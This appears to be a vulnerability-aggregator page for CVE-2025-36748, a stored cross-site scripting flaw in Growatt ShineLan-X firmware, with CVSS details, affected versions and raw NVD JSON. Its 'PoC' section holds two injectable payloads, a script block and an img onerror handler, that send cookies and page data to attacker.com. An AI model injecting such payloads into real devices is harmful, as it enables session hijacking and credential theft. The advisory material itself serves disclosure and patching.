Security Vulnerability Report
中文
CVE-2025-36748 CVSS 5.4 MEDIUM

CVE-2025-36748

Published: 2025-12-13 16:16:54
Last Modified: 2026-01-14 18:05:13
Source: [email protected]

Description

ShineLan-X contains a stored cross site scripting (XSS) vulnerability in the local configuration web server. The JavaScript code snippet can be inserted in the communication module’s settings center. This may allow attackers to force a legitimate user’s browser’s JavaScript engine to run malicious code.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:growatt:shine_lan-x_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:growatt:shine_lan-x:-:*:*:*:*:*:*:* - NOT VULNERABLE
ShineLan-X 通信模块设置中心所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-36748 PoC: Stored XSS in ShineLan-X Communication Module --> <!-- Login to ShineLan-X with low-privilege account, navigate to communication module settings --> <!-- Inject the following payload in any configuration field --> <script> // Steal user cookies and send to attacker server var stolen_data = { cookies: document.cookie, url: window.location.href, userAgent: navigator.userAgent }; fetch('https://attacker.com/collect?data=' + btoa(JSON.stringify(stolen_data)), { method: 'GET', mode: 'no-cors' }); </script> <!-- Alternative payload for session hijacking --> <img src=x onerror="fetch('https://attacker.com/log?cookie='+document.cookie)"> <!-- After injection, any user viewing the affected page will execute the script -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36748", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:53.850", "lastModified": "2026-01-14T18:05:12.740", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ShineLan-X contains a stored cross site scripting (XSS) vulnerability in the local configuration web server. The JavaScript code snippet can be inserted in the communication module’s settings center. This may allow attackers to force a legitimate user’s browser’s JavaScript engine to run malicious code."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:L/SC:H/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:growatt:shine_lan-x_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.6.0.0", "versionEndExcluding": "3.6.0.2", "matchCriteriaId": "1176EDB4-C08F-4592-8C16-321A8A0539C4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:growatt:shine_lan-x:-:*:*:*:*:*:*:*", "matchCriteriaId": "DD537AAA-F836-496A-BC05-6CAED38FB271"}]}]}], "references": [{"url": "https://csirt.divd.nl/CVE-2025-36748/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.